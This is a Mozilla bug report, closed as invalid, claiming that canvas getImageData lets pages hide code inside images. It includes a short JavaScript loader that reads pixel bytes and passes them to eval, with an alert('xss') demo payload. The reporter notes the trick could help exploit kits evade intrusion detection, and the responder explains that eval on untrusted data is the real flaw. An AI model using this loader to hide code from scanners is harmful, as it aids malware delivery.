Closed Bug 813868 Opened 12 years ago Closed 12 years ago

canvas getImageData opens security whole for code

Categories

(Core :: General, defect)

Product:
Core
Component:
General
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: bertram, Unassigned)

Details

Attachments

(1 file)

canvas.zip
716 bytes, application/octet-stream
Details
Attached file canvas.zip 
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121025210744

Steps to reproduce:

With the canvas it is possible to read byte data out of an image.
Images himself can come from different urls (hosts) without restriction.
What happens when someone fill an image with code values as pixel data, load the image into an canvas and interpret it?
He could execute code without any knowledge of any security prevention because the "code" are an image.
What I've done is simple:
1. create an image where the pixel are the color representation of
  window['alert']('xss')
  this could be an gif, png... It depends of the color interpolation in the resulting image.
2. load the image into a web side
3. create an canvas object an put the image inside.
4. read the byte data of the canvas and cast it as string to eval
Eh viola

This is small js for it:
var img=new Image();
img.onload=function()
{
var ca = document.createElement('canvas');
ca.width=this.width;
ca.height=this.height;
var ctx = ca.getContext('2d');
ctx.drawImage(this,0,0);
var a="",d=ctx.getImageData(0, 0,this.width, this.height).data;
for(var i=0;i<d.length;i++){
if(d[i]<255) a+=String.fromCharCode(d[i]);
}
eval(a);
}
img.src="exploid.gif";


Actual results:

The alert box is displayed,
OS: Linux → All
Hardware: x86_64 → All
Given https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034 this is clearly not security-sensitive.

And further, it's invalid.  The security issue is in calling eval() on untrusted strings, which a web page can get in all sorts of ways, not in getImageData.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID
Yes eval the real problem. But with this way there is no way for any intrusion detection systems to can text and code, because it's in an image.
So for something like BlackHole kit it would be easier to deliver any code without restriction to any prevention system.
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: